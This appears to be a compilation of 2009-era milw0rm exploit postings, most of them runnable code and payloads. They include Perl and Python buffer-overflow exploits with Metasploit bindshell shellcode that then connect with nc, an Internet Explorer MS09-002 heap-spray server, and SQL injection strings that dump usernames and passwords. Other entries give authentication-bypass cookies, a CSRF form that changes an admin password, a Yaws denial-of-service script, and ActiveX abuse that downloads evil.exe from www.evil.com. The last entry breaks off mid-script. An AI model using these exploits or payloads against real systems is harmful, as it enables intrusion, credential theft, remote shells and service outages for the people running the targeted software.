Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Belkin BullDog Plus UPS-Service Buffer Overflow Exploit

Tested on Windows XP SP3
JMP ESP from user32.dll, 0x7E429353
Shellcode is bind 4444 from Metasploit

nc host port < belkin-buldog-exploit

Thats all folks!

http://milw0rm.com/sploits/2009-belkin-bulldog-exploit.zip

# milw0rm

Graugon PHP Article Publisher 1.0 (SQL/CH) Multiple Remote Vulnerabilities

[0x01] Informations:

Name : Graugon PHP Article Publisher 1.0
Download : http://www.hotscripts.com/listings/jump/download/88458/
Vulnerability : Multiple Sql Injections / Insecure Cookie Handling
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian

[0x02] Bug:

Bugged Page: index.php [..] admin.php [..] view.php

[Code]
$c = $_GET['c'];

$query = "SELECT * FROM p_categories WHERE id=$c";
$result = mysql_query($query);
[/code]

[code]

$TwoMonths = 60 * 60 * 24 * 60 + time();
setcookie(g_admin, 1, $TwoMonths);

[/code]

[code]

$id = $_GET['id']; [..]

$query = "SELECT * FROM p_articles WHERE id=$id";
$result = mysql_query($query);
[/code]

[0x03] Exploits:

Exploits: http://victim.it/path/?c=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
http://victim.it/path/view.php?id=1 union select 0,0,0,concat(id,password,email),0,0 from p_settings
javascript:document.cookie ="g_admin=1; path=/"

# milw0rm

BlogMan 0.45 Multiple Remote Vulnerabilities

Application: BlogMan
http://sourceforge.net/projects/blogman/
Version: 0.45
Bug: * Multiple SQL Injection
* Authentication Bypass
* Privilege Escalation
Exploitation: Remote
Date: 1 Mar 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: drosophilaxxx@gmail.com


*************************************************

- BUGS

This blog is entirely vulnerable to SQL Injection.
The following are vulnerable queries that can be used
to obtain reserved information.

#[1] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: index.php, register.php, viewall.php

The following lines are improperly checked:

/*
if (isset($_COOKIE['blogmanuserid'])) {
$id = $_COOKIE['blogmanuserid'];
$query = "SELECT * FROM user WHERE UserID='".$id."'";
$user = mysql_fetch_array(mysql_query($query)) or die(mysql_error());
echo "

href='edit.php?id=".$id."'>".$user['UserName']."

\n";
*/

Using a cookie editor it is possible to edit that cookie
and manage the query, as follows:

Name: blogmanuserid
Content: -1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user#
Server: target_server (example: localhost)
Path: /blogman/


#[2] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: read.php

This bug allows a guest to view the username
and password of a registered user.

http://site/path/read.php?id=-1'UNION ALL SELECT
NULL,2,CONCAT(UserName,char(58),UserPassword),NULL,5,6,7 FROM user%23


#[3] SQL Injection:

Requisites: magic_quotes_gpc = off

File affected: profile.php

This bug allows a guest to view the username
and password of a registered user.

http://site/path/profile.php?id=-1' UNION ALL SELECT
1,CONCAT(UserName,char(58),UserPassword),3,4,5,6,7,8,9,10,11,12,13,14,15,16
FROM user%23


#[1] Authentication Bypass:

Requisites: magic_quotes_gpc = off

File affected: doLogin.php

The following lines are improperly checked:

/*
$un = $_POST['un'];
$pw = $_POST['pw'];

...

$pwHashed = mysql_fetch_array(mysql_query("SELECT PASSWORD('".$pw."')"));
$userRow = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserName='".$un."'"));
if ($userRow['UserPassword'] == $pwHashed[0] &&
$userRow['UserActive'] && !$userRow['UserDisabled']) {
$expires = time() + 3*24*60*60;
setcookie("blogmanuserid", $userRow['UserID'], $expires);
}
*/

Using a SQL Injection bug it is possible to bypass
conditions and to set an arbitrary UserID value.

The following information must be sent using
POST method to doLogin.php

un = ' UNION ALL SELECT
1,NULL,PASSWORD('mypass'),NULL,NULL,NULL,NULL,NULL,NULL,0,1,NULL,NULL,NULL,NULL,NULL#
pw = mypass

The First value is UserID, the third value is the password,
the tenth value is UserDisabled and the eleventh value is
UserActive.


#[2] Authentication Bypass:

Requisites: none

File affected: all

It is possible to bypass the authentication
system by creating a cookie named 'blogmanuserid',
and inserting the value of a registered user id
into the content(sometimes 1 for admin):

Name: blogmanuserid
Content: 1
Server: target_server (example: localhost)
Path: /blogman/


Privilege Escalation:

Requisites: magic_quotes_gpc = off

File affected: admin.php

It is possible to escalate privileges using
a SQL Injection bug through a cookie.

The following lines are improperly checked:

/*
$id = $_COOKIE['blogmanuserid'];
$user = mysql_fetch_array(mysql_query("SELECT * FROM user WHERE
UserID='".$id."'"));
if (!$user['UserCanAdmin']) {
echo "meta equiv="'refresh'" content="'0;index.php'" /head /html";
} else {
...
}
*/

Name: blogmanuserid
Content: -1' UNION ALL SELECT 2,NULL,3,4,5,6,7,8,9,10,11,12,13,14,15,1#
Server: target_server (example: localhost)
Path: /blogman/

The first value is UserID and the last value
is UserCanAdmin.

# milw0rm

Easy File Sharing Web Server 4.8 File Disclosure Vulnerability

Easy File Sharing Web Server File Disclouse Vulnerability

Program: Easy File Sharing Web Server
Version: 4.8
Download: http://www.sharing-file.com/efssetup.exe
Found by Mountassif Moad
www.v4-team.com

-- Bug --
Exploit :

http://127.0.0.1/disk_c/thumbnail.ghp?vfolder=../../.././/./../../boot.ini if you have a hard disk like d or f you change disk_c by disk_d or disk_f some host dont have this and if dont work in first test try to register and test another time. Tested on win xp SP 2 fr

# milw0rm

EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)

#!/usr/bin/perl
#
# EFS Easy Chat Server Authentication Request Buffer Overflow (SEH)
#
# Reference: http://www.milw0rm.com/exploits/8142
#
# Tested in Windows XP Pro SP2-3
#
# Coded by Dr4sH (Bruno F.)
#
# Contact: dr4sh[at]hotmail[dot]com
#
# Thankz: His0ka, str0ke, Vinicius N.
#
#[......................................................]
#
# bt~# perl easychat_server_bof.pl 192.168.1.64
#
# EFS Easy Chat Server Remote BoF Exploit (SEH)
#
# [*] Sending Diabolic request...
# [*] Connecting to bindshell 192.168.1.64:9999
#
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\Easy Chat Server>
#
#[......................................................]
#
# Enjoy!
#

use IO::Socket;

print "\nEFS Easy Chat Server Remote BoF Exploit (SEH)\n\n";

$host = shift || die "Usage: perl $0 \n";

$junk = "\x90" x 208;
$jmp = "\xEB\x06\xAE\xFA";
$ppr = "\xB6\xB2\x01\x10";

$shellcode = "\xd9\xe8\xd9\x74\x24\xf4\xbb\xb6\x14\x60\xe5\x5d\x33\xc9\xb1".
"\x50\x31\x5d\x19\x03\x5d\x19\x83\xed\xfc\x54\xe1\x9c\x8f\x73".
"\x47\xb5\xa9\x7c\xa7\xba\x2a\x09\x34\x61\x8f\x86\x80\x55\x44".
"\xe4\x0f\xde\x5b\xfb\x9b\x51\x44\x88\xc3\x4d\x75\x65\xb2\x06".
"\x41\xf2\x44\xf7\x9b\xc4\xde\xab\x58\x04\x94\xb4\xa1\x4e\x58".
"\xba\xe3\xa5\x97\x87\xb7\x1d\x70\x8d\xd2\xd6\xdf\x49\x1c\x03".
"\xb9\x1a\x12\x98\xcd\x42\x37\x1f\x39\x7f\x6b\x94\x34\xec\x57".
"\xb6\x27\x2e\xa6\x1d\xc3\x3b\x8a\x91\x87\x7c\x01\x5a\xe7\x60".
"\xb4\xd7\x48\x91\x98\x8f\xc6\xef\x2a\xa3\x87\x10\xe4\x5d\x7b".
"\x89\x61\x92\x49\x3d\x05\xa7\x9f\xe2\xbd\xb8\x30\x74\xf5\xab".
"\x4d\xbe\x59\xcc\x78\x9e\xd0\xd7\xe3\xa0\x0e\x1f\xee\xf7\xba".
"\x1d\x11\x27\x52\xf8\xe4\x3d\x0e\xad\x09\x6b\x02\x02\xa5\xc7".
"\xf6\xe7\x1a\xab\xab\x18\x4c\x4d\x24\xc1\x62\xf4\xe7\x84\x9c".
"\x6d\x6f\x32\x44\xfe\xb7\x6d\x86\x28\x5d\x81\x29\x80\x5d\x71".
"\xa1\x8e\x0f\x5f\xdb\x98\xb0\x49\x48\x72\xb0\xa5\x07\x99\x07".
"\xc3\x91\x36\x67\x1d\x71\xed\xc3\xf4\x8d\xdd\x7f\x9e\x96\xa7".
"\xb9\x27\x0e\xa7\x90\x82\x4f\x87\x7b\x46\xd4\x4e\xec\xf5\x79".
"\x06\x09\x93\xd1\x41\xfb\xaf\x5b\x96\x91\x6b\xd5\xbb\x57\xb3".
"\x16\x91\x66\x71\xf4\x18\xd4\x59\x95\x68\xa3\x99\x32\xd9\xff".
"\xb1\x36\xe0\xb3\x57\x48\x69\xf0\xa8\x60\xc9\xaf\x04\xdc\xbf".
"\x1e\xc2\xdf\x6e\xf0\x47\xb1\x6f\x22\x0f\x9c\x49\xc6\x01\x8d".
"\x96\x1f\xf7\xcd\x96\x97\xf8\xe2\xe2\x8f\xfa\x80\x31\x4b\xfd".
"\x51\xeb\x6b\xd1\x36\xfc\x1e\xd5\x99\xaf\xe1\x03\xda\x80\x14";

$buffer = $junk.$jmp.$ppr.$shellcode;

$socket = IO::Socket::INET->new(PeerAddr=> $host,
PeerPort=> '80',
Proto=> 'tcp',
Timeout=>'1') || die "[-] Unable to Connect.!\n";

print "[*] Sending Diabolic request...\n";

print $socket "GET /chat.ghp?username=".$buffer."&password=ydw&room=2&ydw=2 HTTP/1.1\r\n";
print $socket "Host: $host\r\n\r\n\r\n";

close($socket);

print "[*] Connecting to bindshell $host:9999\n\n";

system("nc $host 9999");

# milw0rm

MS Internet Explorer 7 Memory Corruption Exploit (MS09-002) (fast)

#
# Author : Ahmed Obied (ahmed.obied@gmail.com)
#
# - Based on the code found by str0ke in the wild for MS09-002
# - Tested using Internet Explorer 7.0.5730.11 on Windows XP SP2
#
# Usage : python ie_ms09002.py [port]
#

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):

def get_payload(self):
# win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub
# http://metasploit.com
payload = '\x31\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6f'
payload += '\x02\xb1\x0e\x83\xeb\xfc\xe2\xf4\x93\xea\xf5\x0e\x6f\x02\x3a\x4b'
payload += '\x53\x89\xcd\x0b\x17\x03\x5e\x85\x20\x1a\x3a\x51\x4f\x03\x5a\x47'
payload += '\xe4\x36\x3a\x0f\x81\x33\x71\x97\xc3\x86\x71\x7a\x68\xc3\x7b\x03'
payload += '\x6e\xc0\x5a\xfa\x54\x56\x95\x0a\x1a\xe7\x3a\x51\x4b\x03\x5a\x68'
payload += '\xe4\x0e\xfa\x85\x30\x1e\xb0\xe5\xe4\x1e\x3a\x0f\x84\x8b\xed\x2a'
payload += '\x6b\xc1\x80\xce\x0b\x89\xf1\x3e\xea\xc2\xc9\x02\xe4\x42\xbd\x85'
payload += '\x1f\x1e\x1c\x85\x07\x0a\x5a\x07\xe4\x82\x01\x0e\x6f\x02\x3a\x66'
payload += '\x53\x5d\x80\xf8\x0f\x54\x38\xf6\xec\xc2\xca\x5e\x07\x7c\x69\xec'
payload += '\x1c\x6a\x29\xf0\xe5\x0c\xe6\xf1\x88\x61\xd0\x62\x0c\x2c\xd4\x76'
payload += '\x0a\x02\xb1\x0e';
return self.convert_to_utf16(payload)

def get_exploit(self):
exploit = '''

function spray_heap()
{
var payload = unescape("payload");

var ret = 0x0c0c0c0c;
var heap_chunk_size = 0x40000;

var nopsled_size = heap_chunk_size - (payload.length * 2)
var nopsled = unescape("%u0c0c%u0c0c");
while (nopsled.length < nopsled_size)
nopsled += nopsled;

heap_chunks = new Array();
heap_chunks_num = (ret - heap_chunk_size)/heap_chunk_size;
for (var i = 0 ; i < heap_chunks_num ; i++)
heap_chunks[i] = nopsled + payload;
}

function trigger_bug()
{
var obj = document.createElement("table");
obj.click;

var obj_cp = obj.cloneNode();
obj.clearAttributes();
obj = null;

CollectGarbage();

var img = document.createElement("img");
img.src = unescape("%u0c0c%u0c0cCCCCCCCCCCCCCCCCCCCCCC");

obj_cp.click;
}

if (navigator.userAgent.indexOf("MSIE 7") != -1) {
spray_heap();
trigger_bug()
} else
window.location = "about:blank"

'''
exploit = exploit.replace('payload', self.get_payload())
exploit = 'html body script' + exploit + '/script /body /html '
return exploit

def convert_to_utf16(self, payload):
# From Beta v2.0 by Berend-Jan Wever
# http://www.milw0rm.com/exploits/656
enc_payload = ''
for i in range(0, len(payload), 2):
num = 0
for j in range(0, 2):
num += (ord(payload[i+j]) & 0xff) << (j*8)
enc_payload += '%%u%04x' % num
return enc_payload

def log_request(self, *args, **kwargs):
pass

def do_GET(self):
print '[-] Incoming connection from %s' % self.client_address[0]
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
print '[-] Sending exploit to %s ...' % self.client_address[0],
self.wfile.write(self.get_exploit())
print 'done'

def main():
if len(sys.argv) != 2:
print 'Usage: %s [port]' % sys.argv[0]
sys.exit(1)
port = None
try:
port = int(sys.argv[1])
if port <> 65535:
raise ValueError
except ValueError:
print '[*] ERROR: invalid port number ...'
sys.exit(-1)
try:
serv = HTTPServer(('', port), RequestHandler)
ip = socket.gethostbyname(socket.gethostname())
print '[-] Web server is running at http://%s:%d/' % (ip, port)
except socket.error:
print '[*] ERROR: a socket error has occurred ...'
sys.exit(-1)
try:
serv.serve_forever()
except KeyboardInterrupt:
print '[-] Exiting ...'

if __name__ == '__main__':
main()

# milw0rm

Yaws < 1.80 (multiple headers) Remote Denial of Service Exploit

#!usr/bin/perl -w

#######################################################################################
# Yaws before 1.80 allows remote attackers to cause a denial of service (memory
# consumption and crash) via a request with a large number of headers.
# Refer:
# http://yaws.hyber.org/
# http://www.securityfocus.com/bid/33834/discuss
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0751
#
#$$$$$This was strictly written for educational purpose. Use it at your own risk.$$$$$
#$$$$$Author will not bare any responsibility for any damages watsoever.$$$$$$$$$$$$$$
#
# Author: Praveen Dar$hanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://www.darshanams.blogspot.com/
# Date: 03rd March, 2009
# Site: http://www.evilfingers.com/
#
###Thanx to str0ke, milw0rm, Manuel Duran Aguete, @rp m@n, and all the Security Folks###
########################################################################################

use IO::Socket;

print("\nEnter IP Address of Yaws Server(not domain): \n");
$vuln_host_ip = ;
chomp($vuln_host_ip);
$port = 80;

$sock_http = IO::Socket::INET->new( PeerAddr => $vuln_host_ip,
PeerPort => $port,
Proto => 'tcp') || "Unable to create HTTP Socket";


$headers="Date: Tue, 03 Mar 2009 15:17:53 GMT\r\n".
"Accept-Ranges: bytes\r\n".
"Content-Language: en\r\n".
"Content-Type: text/html; charset=utf-8\r\n".
"Expires: Thu, 05 Mar 2009 15:17:53 GMT\r\n".
"Cache-Control: no-cache\r\n".
"Content-Encoding: gzip\r\n".
"Retry-After: 100\r\n";
print "\nHeaders are:\n$headers";

$i=0;
while($i<=13) #this is just a PoC
{
$headers=$headers.$headers;
$i++;
}
print "\nHeaders are:\n$headers";
$yaws_attack = "GET / HTTP/1.1\r\n".
"Host: $vuln_host_ip:$port\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
$headers.
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"\r\n";
sleep(3);
print $sock_http $yaws_attack;
sleep(2);
print"\nRequest with large number of Headers sent...\n";

close($sock_http);

# milw0rm

EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability

HTML
!--
EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability
Version: 2.2
Date: Jan 11, 2007
Size:1519KB
Download Easy Chat Server http://www.echatserver.com/ecssetup.exe
By Mountassif Moad
-->
HEAD
TITLE EFS Easy Chat Server (XSRF) Change Admin Pass Vulnerability /TITLE
SCRIPT LANGUAGE="JavaScript"
/SCRIPT
/HEAD
BODY bgcolor="#008000" LANGUAGE="JavaScript"
div align=center
TABLE border="2" width="250"
FORM action="http://127.0.0.1/registresult.htm" method="POST" name="regist" onsubmit="return check();"
TR
TD align="center" class="title" font color=red>Booom!!/font /TD
/TR
TR
TD Username:
INPUT type="text" name="UserName" maxlength="30" value="admin" *
/TD /TR
TR TD
Password: INPUT type="password" name="Password" maxlength="30" value="stack" *
/TD /TR
TR
TD Confirm Password:
INPUT type="password" name="Password1" maxlength="30" value="stack" *
/TD /TR>
TR
/TD /TR
TR TD
Email: INPUT type="text" name="Email" value="admin@127.0.0.1.com" maxlength="30"
/TD /TR
TR TD
/TD /TR
TR TD
BR
TEXTAREA rows="4" cols="30" name="Resume"chi le3ba /TEXTAREA
/TD /TR
TR TD align="center"
INPUT type="submit" value="Click here to test" name=submit1
INPUT type="button" value="Close" name=button1 onclick="window.close();"
/TD /TR
/form /TABLE
/div
script language="JavaScript"
/script
/BODY
/HTML

# milw0rm

Imera ImeraIEPlugin ActiveX Control Remote Code Execution Exploit

Who:
Imera(http://www.imera.com)
Imera TeamLinks Client(http://teamlinks.imera.com/install.html)

What:
ImeraIEPlugin.dll
Version 1.0.2.54
Dated 12/02/2008
{75CC8584-86D4-4A50-B976-AA72618322C6}
http://teamlinks.imera.com/ImeraIEPlugin.cab

How:
This control is used to install the Imera TeamLinks Client package. The control fails to validate the content that it is to download and install is indeed the Imera TeamLinks Client software.

Exploiting this issue is quite simple, like so:

object classid="clsid:75CC8584-86D4-4A50-B976-AA72618322C6"
id="obj"
param name="DownloadProtocol" value="http" /
param name="DownloadHost" value="www.evil.com" /
param name="DownloadPort" value="80" /
param name="DownloadURI" value="evil.exe" /
/object

Fix:
The vendor has been notified.

Workaround:
Set the killbit for the affected control, see http://support.microsoft.com/kb/240797. Use the Java installer for TeamLinks Client or install the software manually from: http://teamlinks.imera.com/download.html

Elazar

# milw0rm

Sopcast SopCore Control (sopocx.ocx) Command Execution Exploit

-- Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer()
user assisted remote code execution poc
by Nine:Situations:Group::surfista (IE7/8)

our site: http://retrogod.altervista.org/
software site: http://www.sopcast.org/

Through the SetExternalPlayer() method and the ExternalPlayer property is possible to associate an arbitrary executable to the "external player" button (for clearness see http://www.sopcast.com/docs/ where the player control buttons are showed) which opens Windows Media Player by default. When the user click this button, the executable is launched without prompts Also this value is stored in config.xml, inside the sopcast local folder for further use, ex. with the sopcast client application Note: this control is safe for scripting and safe for initialization
--
HTML
HEAD
script language="Javascript" type="text/JavaScript"
window.onload=function()
{
SopPlayer.InitPlayer();
//SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe");
SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
SopPlayer.SetChannelName("CCTV5");
SopPlayer.Play();
}
/script
/HEAD
BODY
OBJECT
ID="SopPlayer"
name="SopPlayer"
CLASSID=clsid:8FEFF364-6A5F-4966-A917-A3AC28411659
HEIGHT=375
WIDTH=375
/OBJECT
/BODY
/HTML

# milw0rm

EFS Easy Chat Server Authentication Request BOF Exploit (SEH)

#!/usr/bin/python
#[*] Bug : EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (SEH)
#[*] Refer : http://www.milw0rm.com/exploits/4289
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ)

import struct
import socket



buf = "\x41"*216
buf += "\xEB\x06\xAE\xFA" #jmp+6
buf += "\xB6\xB2\x01\x10" #universal pop pop ret
buf += "\x90"*19

# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
buf+=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa4"
"\x0d\x2b\xba\x83\xeb\xfc\xe2\xf4\x58\xe5\x6f\xba\xa4\x0d\xa0\xff"
"\x98\x86\x57\xbf\xdc\x0c\xc4\x31\xeb\x15\xa0\xe5\x84\x0c\xc0\xf3"
"\x2f\x39\xa0\xbb\x4a\x3c\xeb\x23\x08\x89\xeb\xce\xa3\xcc\xe1\xb7"
"\xa5\xcf\xc0\x4e\x9f\x59\x0f\xbe\xd1\xe8\xa0\xe5\x80\x0c\xc0\xdc"
"\x2f\x01\x60\x31\xfb\x11\x2a\x51\x2f\x11\xa0\xbb\x4f\x84\x77\x9e"
"\xa0\xce\x1a\x7a\xc0\x86\x6b\x8a\x21\xcd\x53\xb6\x2f\x4d\x27\x31"
"\xd4\x11\x86\x31\xcc\x05\xc0\xb3\x2f\x8d\x9b\xba\xa4\x0d\xa0\xd2"
"\x98\x52\x1a\x4c\xc4\x5b\xa2\x42\x27\xcd\x50\xea\xcc\xfd\xa1\xbe"
"\xfb\x65\xb3\x44\x2e\x03\x7c\x45\x43\x6e\x4a\xd6\xc7\x0d\x2b\xba")

head = "GET /chat.ghp?username="+buf+"&password="+buf+"&room=1 HTTP/1.1\r\n"
head += "Host: 127.0.0.1\r\n"


s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('127.0.0.1',80))
s.send(head + "\r\n\r\n")
s.close()

# milw0rm

POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)

#!/usr/bin/perl
# KL0209EXP-poppeeper_uidl-bof.pl
# 02.27.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (gotta love no /SafeSEH). Special thanks goes to James Burton for help
# and collaboration for exploitation of this bug :P. Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
# Jayji (James Burton) [jayjiftw@gmail.com]
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.jpg
#
# KL0209EXP-poppeeper_uidl-bof.pl

use IO::Socket;

$nextsehh = 0x909006EB; # JMP 6
$sehh = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret

# Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread)
$sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" .
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" .
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" .
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" .
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e" .
"\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38" .
"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x34\x4e\x53\x4b\x58\x4e\x47" .
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" .
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x38" .
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" .
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" .
"\x46\x4f\x4b\x53\x46\x35\x46\x32\x4a\x42\x45\x57\x45\x4e\x4b\x48" .
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x54" .
"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58" .
"\x49\x38\x4e\x56\x46\x52\x4e\x51\x41\x36\x43\x4c\x41\x43\x4b\x4d" .
"\x46\x36\x4b\x58\x43\x54\x42\x53\x4b\x48\x42\x44\x4e\x30\x4b\x58" .
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x54\x4a\x50\x50\x55\x4a\x46" .
"\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56" .
"\x43\x35\x48\x36\x4a\x46\x43\x43\x44\x53\x4a\x46\x47\x47\x43\x37" .
"\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" .
"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e" .
"\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" .
"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55" .
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x55\x43\x35\x43\x35\x43\x34" .
"\x43\x55\x43\x44\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x46\x49\x4d" .
"\x43\x30\x48\x36\x43\x55\x49\x38\x41\x4e\x45\x49\x4a\x46\x46\x4a" .
"\x4c\x31\x42\x47\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41" .
"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42" .
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x45\x4e\x49\x54\x48\x48\x49\x54\x47\x35\x4f\x4f\x48\x4d" .
"\x42\x55\x46\x45\x46\x55\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" .
"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x55" .
"\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x46\x48\x56\x4a\x46\x43\x36" .
"\x4d\x36\x49\x48\x45\x4e\x4c\x36\x42\x55\x49\x45\x49\x32\x4e\x4c" .
"\x49\x48\x47\x4e\x4c\x36\x46\x54\x49\x38\x44\x4e\x41\x43\x42\x4c" .
"\x43\x4f\x4c\x4a\x50\x4f\x44\x34\x4d\x32\x50\x4f\x44\x54\x4e\x32" .
"\x43\x39\x4d\x48\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36" .
"\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f" .
"\x48\x4d\x4b\x45\x47\x45\x44\x55\x41\x35\x41\x55\x41\x35\x4c\x36" .
"\x41\x50\x41\x55\x41\x35\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x56" .
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36" .
"\x4f\x4f\x4f\x4f\x47\x43\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f" .
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d" .
"\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x55\x4f\x4f\x48\x4d" .
"\x4f\x4f\x42\x4d\x5a";

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>'110',
Listen=>1,
Timeout=>60)
or die "Error: listen(110)\n";

$cli = $serv->accept() or die "Error: accept()\n";

$nextseh = pack('l', $nextsehh);
$seh = pack('l', $sehh);
$nop = "\x90";

$payload = "+OK\r\n1 " . "A" x 1072 . $nextseh . $seh . $nop x 32 . $sc . "\r\n.\r\n";

$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 1 100\r\n");
$cli->recv($recvbuf, 512);
$cli->send($payload);

close($cli);
close($serv);

# milw0rm

Orbit <= 2.4 Long Hostname Remote Buffer Overflow Exploit

html
body

Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc

Vulnerability discovered by Secunia

Exploit and POC provided by: JavaGuru



Right click on link below then choose download by orbit, CALC.EXE will pop up.

I got a lot of problems when trying to execute shellcode, because a lot of chars was forbidden and I was not able to execute shellcode. After playing a little I found out the solution. Don't forget, open this HTML in Firefox.

Check it out.

Any questions/comments: JavaGuru1999@yahoo.de

script language="JavaScript"
var tmp = "http://";

for (i=0;i<508;i++) tmp +="%6F";

// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "%7B%46%86%7C";

// some nops
tmp += "%90%90%90%90";

// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
